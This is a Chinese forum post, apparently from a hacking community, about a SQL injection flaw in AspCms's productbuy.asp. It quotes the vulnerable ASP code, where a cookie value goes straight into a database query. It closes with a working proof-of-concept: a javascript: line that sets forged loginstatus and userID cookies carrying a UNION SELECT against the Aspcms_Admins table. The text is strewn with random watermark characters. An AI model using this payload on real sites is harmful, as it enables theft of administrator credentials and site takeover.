好久没上土司了,上来一看发现在删号名单内.....5 O; I$ i3 B. I
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
( m6 p4 t5 F# N S, y7 V废话不多说,看代码:
8 B- x! Z8 I1 T: p( y' A7 v+ f7 K& v- z$ R( T
<%
, O% n1 O6 S" G" u: M% x# P# m1 p
if action = "buy" then
9 r7 U. e+ K Z4 Y7 q& {3 `, G1 b/ s5 p" G1 b
addOrder()
' P! R L& ^! ?& b1 Z+ [ x$ G9 O! L+ ]3 ~8 h, X& k
else
! s B9 E$ {# B( K+ g& {, o' i6 K- l/ W! \' }/ U- B
echoContent()
1 h7 _& F. d3 z' [
. o3 ?# e$ Y+ @( s/ ?* Uend if
- z# B) A- z6 z$ c2 v* w; h
, c& _, t* I: ]9 ^% R, |5 c' E5 ?( W" v: B1 i
7 s- M9 ^+ r& @; g7 e……略过* C$ ~: p% \- z. J- K
( f$ {2 w# _ N
: Y0 W; E: e" N# O. g O
- a8 G# E; [: _, J" o: `Sub echoContent()
7 p+ T% @! @% A+ r* [$ d
5 u0 f3 p; Y S2 m" z. S* b7 z dim id8 U( S* L+ ]" Y0 X) G' Q
2 [ B4 ^8 `9 ]3 q$ c% h: u
id=getForm("id","get")" M4 H" ^7 w; p k2 Z3 P
& v3 }+ }% T6 L `# T
l% e( X, F; w L
1 t0 p9 \% ?: J& f* J; ~! @1 e if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 0 G! F; T9 \, A; K" f6 q
$ q) `) x, |6 c8 n( k
0 ~2 H: Y7 h3 m" n6 }0 ~0 _! \( f0 u) G p; s' A
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")2 B( Y8 L, j; L+ n+ j4 G& t# b* t
/ N {' y! Q* E3 |* r i& p! j% K2 S dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct7 m2 U. U4 `! b
/ `$ w% m$ M3 Q6 E! j
Dim templatePath,tempStr
3 ^8 i, H6 V5 w3 w
# B! k- @0 Q; p2 X; O templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"3 \- g' H. R( A! t
/ @5 Z0 S6 d" f* m6 Y
( v# k5 U* j) {- a9 l: w) F
7 g; `4 N; Z7 e6 F set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
8 P ~" B% ~; o4 v: z& A) ]
" b" x F1 k& H# m selectproduct=rsObj(0)2 a2 ^/ M9 R) V6 H5 D$ k% F
3 c' i, ?) W" r) x5 ~8 K
4 M: Z8 W* S G @8 a1 r O: C' g, z/ k; C7 x! c' A3 ]
Dim linkman,gender,phone,mobile,email,qq,address,postcode* i) L! ?% h5 D& F
, }2 E) n9 E/ Q8 k% @/ M0 b
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0$ n# g. o0 d# p+ T# R3 q
% i( R6 S! z- e- ^- @4 y, T' B
if rCookie("loginstatus")=1 then + [( y4 s1 J3 K5 A4 `) |
* _8 U- I+ V7 E" y) Z, Q
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
+ n+ s0 {( a9 f3 V1 H" p. j$ J9 ^ g- ]8 N: z" Z% U+ T
linkman=rsObj("truename")
7 c- b9 q6 f1 S+ v6 k3 G4 {& x
% R; T( h3 u7 }. d gender=rsObj("gender")! k; F3 r1 f% n' C
g6 g$ K$ _$ ?9 m' Q1 i phone=rsObj("phone")
( o' B% {- a8 X8 X2 e- ~7 C8 y$ u
mobile=rsObj("mobile")9 P1 Y/ C% _: S2 @
. p* M2 ?4 s4 n5 a0 ^ t1 I, e: r# ?
email=rsObj("email")
$ m8 D3 Q% C1 c4 F; S* n: V1 }4 G, d$ w. W4 m
qq=rsObj("qq")
3 i9 o5 \& @! l, S; q. @, x2 {9 F8 c, i, D% h! g6 m
address=rsObj("address"). v7 |( A0 b$ E k) n9 J1 v
6 ~6 i& L7 C- K. ?* [! e3 |
postcode=rsObj("postcode")
: ] d9 l9 v; X' b, R% r5 b
, v9 N. S$ i2 q& ]; b$ _) X4 ? else + J5 b* ?% R* N
: F0 q; ]) v' W% {4 T
gender=1
( Y; J1 M' _8 E( G! B7 _7 }4 ^, I
! g9 r7 S9 @) _$ u# t7 H end if& F; [$ n. O3 h, W+ Z- A2 O+ a6 ~
- R" C& U( A0 U- F4 ~ R rsObj.close()
: _- P) |; N0 b3 N7 I
2 m/ P% J$ R( S: @5 D% ?% e* I
6 a% V# U6 V' `! u& c; Y
7 z* k: ?5 e4 @7 u6 c* [ q with templateObj ' o$ D8 R/ B# x/ D
9 Y% p, \" {, _/ r9 f .content=loadFile(templatePath) 7 j. k) R5 x$ {8 f2 x& f; Q3 [. p
4 O2 U# Z- b5 P: @ .parseHtml()6 C) v0 z- k# b; r2 V' j D
1 H+ H3 r$ Q7 e) h8 X9 {( z
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
) ?: {& C: _3 b
. P6 @# D$ k2 Q+ v/ K .content=replaceStr(.content,"[aspcms:linkman]",linkman)
, e& ^1 B$ B) }' r" w! w0 K
) X T$ c, e/ Q: `0 t .content=replaceStr(.content,"[aspcms:gender]",gender) - k7 V4 W/ l, P" s5 t; z
1 V: B. C, w4 Z% i
.content=replaceStr(.content,"[aspcms:phone]",phone)
+ d! J8 b$ w4 w! A9 j& s6 C
/ {6 L- C# J2 \& |5 V o .content=replaceStr(.content,"[aspcms:mobile]",mobile)
8 [: q$ x$ |" i& a# b+ B" [1 P
9 H$ v& c# [& D) u: @. o5 E .content=replaceStr(.content,"[aspcms:email]",email)
* r( _+ U a W( i, E+ x0 |) d: o# ]
.content=replaceStr(.content,"[aspcms:qq]",qq) % j, w! v: f9 Y" S6 \! l
/ F2 `' c- D9 `& r |2 y1 Y .content=replaceStr(.content,"[aspcms:address]",address)
. [, G9 Y+ v4 B+ |/ S; v
3 K0 ]& \6 u5 p .content=replaceStr(.content,"[aspcms:postcode]",postcode) # n3 a% i( |- t8 ]9 G* V' O
9 ~& M2 I3 W# C7 Y/ _
.parseCommon()
% B5 s% s% ]- N9 c' }4 ?2 z& o7 U% q& a p
echo .content 7 H$ S% R$ ^ M \3 s0 C
( H, ?& z0 I9 L
end with/ e# w& ^' b# B, b& m
. z! i- B! p$ I3 Z5 J: W( l set templateobj =nothing : terminateAllObjects
5 j2 o2 l( n2 |5 D! L
" l7 T% K6 \1 h3 w- U6 l9 v# c0 UEnd Sub. [6 j; `1 r0 V8 H6 K! h
漏洞很明显,没啥好说的' D. T' w" N' {8 t! K' }
poc:. [- F! X6 [" V8 |2 j. _7 ?3 I
4 _" S; E, z8 l0 W4 ?javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子* X: _( ~6 G @" R; M W! }
% [. H- U* `- L
|
发表于 2012-12-27 08:35:05
收藏
支持
反对